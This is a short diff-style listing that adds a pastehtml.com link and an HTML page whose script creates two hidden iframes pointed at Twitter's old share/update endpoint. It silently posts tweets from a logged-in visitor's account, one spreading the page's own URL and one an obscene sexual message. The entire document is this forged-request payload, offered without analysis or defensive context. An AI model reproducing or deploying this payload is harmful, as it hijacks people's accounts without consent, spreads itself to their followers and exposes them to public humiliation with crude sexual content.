| a | b | |
|---|
| 0 | + | http://pastehtml.com/view/1b7xk3b.html |
|---|
| 0 | + | |
|---|
| 0 | + | <html> |
|---|
| 0 | + | <head></head> |
|---|
| 0 | + | <body> |
|---|
| 0 | + | <script> |
|---|
| 0 | + | var el1 = document.createElement('iframe'); |
|---|
| 0 | + | var el2 = document.createElement('iframe'); |
|---|
| 0 | + | el1.style.visibility="hidden"; |
|---|
| 0 | + | el2.style.visibility="hidden"; |
|---|
| 0 | + | el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location; |
|---|
| 0 | + | el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats"; |
|---|
| 0 | + | document.getElementsByTagName("body")[0].appendChild(el1); |
|---|
| 0 | + | document.getElementsByTagName("body")[0].appendChild(el2); |
|---|
| 0 | + | </script> |
|---|
| 0 | + | </body> |
|---|
| 0 | + | </html> |
|---|
| ... | |
|---|